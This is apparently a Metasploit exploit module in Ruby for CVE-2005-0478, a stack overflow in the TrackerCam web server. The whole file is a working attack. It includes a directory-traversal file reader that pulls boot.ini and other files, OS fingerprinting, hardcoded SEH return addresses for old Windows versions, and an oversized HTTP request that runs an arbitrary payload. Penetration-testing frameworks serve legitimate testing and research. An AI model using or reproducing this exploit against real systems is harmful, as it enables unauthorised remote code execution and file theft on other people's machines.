require 'msf/core' module Msf class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote include Exploit::Remote::HttpClient include Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'TrackerCam PHP Argument Buffer Overflow', 'Description' => %q{ This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '13953'], [ 'OSVDB', '13955'], [ 'CVE', '2005-0478'], [ 'BID', '12592'], [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], [ 'MIL', '69'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # EyeWD.exe has a null and we can not use a partial overwrite. # All of the loaded application DLLs have a null in the address, # except CPS.dll, which moves around between instances :-( ['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll ['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll ['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll # Windows XP SP2 and Windows 2003 are not supported yet :-/ ], 'DisclosureDate' => 'Feb 18 2005', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8090) ], self.class) end def check c = connect req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3' }) res = c.send_request(req, -1) if (res and res.body =~ /fsockopen/) fp = fingerprint() print_status("Detected a vulnerable TrackerCam installation on #{fp}") return Exploit::CheckCode::Confirmed end return Exploit::CheckCode::Safe end def exploit c = connect buf = Rex::Text.rand_text_english(8192) seh = generate_seh_payload(target.ret) buf[257, seh.length] = seh uri = "/tuner/TunerGuide.php3?userID=#{buf}" print_status("Sending request...") res = c.send_request(c.request({ 'uri' => uri }), -1) handler disconnect end def download(path) c = connect req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path }) res = c.send_request(req, -1) return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /
/) m = res.match(/(.*)<\/pre><\/body>/smi) return if not m return m[1] end def fingerprint res = download(Rex::Text.rand_text_alphanumeric(12) + '.txt') || return m = res.match(/in (.*)<\/b> on line/smi) return if not m path = m[1] print_status("TrackerCam installation path is #{path}") if (path !~ /^C/i) print_status("TrackerCam is not installed on the system drive, we can't fingerprint it") return end if (path !~ /Program Files/i) print_status("TrackerCam is installed in a non-standard location") end boot = download('boot.ini') || return case boot when /Windows XP.*NoExecute/i return "Windows XP SP2+" when /Windows XP/ return "Windows XP SP0-SP1" when /Windows.*2003/ return "Windows 2003" when /Windows.*2000/ return "Windows 2000" else return "Unknown OS/SP" end end end end